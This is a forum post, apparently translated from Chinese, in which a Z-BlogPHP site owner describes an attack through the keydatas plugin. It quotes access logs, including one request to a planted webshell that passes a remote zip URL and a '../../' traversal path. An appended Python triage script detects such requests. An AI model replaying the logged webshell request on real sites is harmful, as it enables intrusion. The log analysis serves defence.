dz插件网

My website was hacked. What should I do?

迪巴拉
2025/08/12 13:05:35
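Today I found a record on my website showing that someone else had published an article titled "1". I definitely did not post it. I checked BaoTa (宝塔) anti-tamper and there is one block record: /www/wwwroot/www.xxxxx.com/zb_users/upload/ad10523.icu/ccsl.php
Fortunately it was blocked successfully and this PHP file was not created. After that, the website log shows: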
  103.233.8.96 - - [11/Aug/2025:16:19:29 +0800] "POST /zb_users/plugin/keydatas/keydatas_zblog.php?__kds_flag=post HTTP/2.0" 200 101 "https://www.waimaopeixun.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
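He kept requesting the URL of my 简数 (keydatas) collection plugin, carrying several of his external links, and also the file he created. Luckily it was blocked by anti-tamper.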
  103.233.8.96 - - [11/Aug/2025:16:19:47 +0800] "GET /zb_users/upload/ad10523.icu HTTP/2.0" 404 1003 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
  103.233.8.96 - - [11/Aug/2025:16:19:45 +0800] "GET /zb_users/upload/ad10523.icu/ccsl.php HTTP/2.0" 404 1003 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
  103.233.8.96 - - [11/Aug/2025:16:19:43 +0800] "GET /zb_users/upload/ad10523.icu/ccsl.php HTTP/2.0" 404 1003 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
  103.233.8.96 - - [11/Aug/2025:16:19:37 +0800] "GET /zb_users/upload/ad10523.icu/ccsl.php?&1=http://www.r165.com/aoye/1.zip&2=../../Zml.php HTTP/2.0" 403 708 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
  103.233.8.96 - - [11/Aug/2025:16:19:29 +0800] "GET /favicon.ico HTTP/2.0" 200 1919 "/zb_users/plugin/keydatas/keydatas_zblog.php?__kds_flag=post" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
Could the experts please help me analyze this: if I uninstall the 简数 plugin, will the problem be gone?
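
A triage pass over the access log quoted in the post, as an added example that is not part of the original post: it tags each request and lists client IPs that both POSTed to a plugin endpoint and requested a `.php` file under `zb_users/upload/`. The rule names, the assumption that the upload directory should never serve PHP, and the last sample line (constructed) are not from the post.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Log lines from the post (user agent shortened to "UA"); the last line is constructed.
SAMPLE_LOG = """\
103.233.8.96 - - [11/Aug/2025:16:19:29 +0800] "POST /zb_users/plugin/keydatas/keydatas_zblog.php?__kds_flag=post HTTP/2.0" 200 101 "https://www.waimaopeixun.com/" "UA"
103.233.8.96 - - [11/Aug/2025:16:19:37 +0800] "GET /zb_users/upload/ad10523.icu/ccsl.php?&1=http://www.r165.com/aoye/1.zip&2=../../Zml.php HTTP/2.0" 403 708 "-" "UA"
103.233.8.96 - - [11/Aug/2025:16:19:47 +0800] "GET /zb_users/upload/ad10523.icu HTTP/2.0" 404 1003 "-" "UA"
103.233.8.96 - - [11/Aug/2025:16:19:29 +0800] "GET /favicon.ico HTTP/2.0" 200 1919 "/zb_users/plugin/keydatas/keydatas_zblog.php?__kds_flag=post" "UA"
198.51.100.7 - - [11/Aug/2025:16:20:02 +0800] "GET /zb_users/upload/2025/08/photo.jpg HTTP/2.0" 200 48211 "-" "UA"
"""

LINE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

def tag_request(method, target):
    """Return the set of rule names a single request matches."""
    url = urlsplit(target)
    path = url.path.lower()
    tags = set()
    if method == "POST" and path.startswith("/zb_users/plugin/") and path.endswith(".php"):
        tags.add("plugin_post")       # context only: a write through a plugin endpoint
    if path.startswith("/zb_users/upload/") and path.endswith(".php"):
        tags.add("php_in_upload")     # assumption: upload dir holds media, never scripts
    for _, value in parse_qsl(url.query):   # parse_qsl also decodes %2e%2e%2f
        if re.match(r"https?://", value, re.I):
            tags.add("remote_url_param")
        if "../" in value or "..\\" in value:
            tags.add("traversal_param")
    return tags

def analyze(log_text):
    """Map each client IP to the union of tags over all of its requests."""
    per_ip = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE.match(line)
        if m:
            per_ip[m["ip"]] |= tag_request(m["method"], m["target"])
    return dict(per_ip)

def suspects(log_text):
    """IPs that POSTed to a plugin endpoint and also requested a .php under upload/."""
    return sorted(ip for ip, tags in analyze(log_text).items()
                  if {"plugin_post", "php_in_upload"} <= tags)

if __name__ == "__main__":
    for ip, tags in analyze(SAMPLE_LOG).items():
        print(ip, sorted(tags))
```

Run against the full log rather than one day, and review every file the anti-tamper tool did not cover for the same time window.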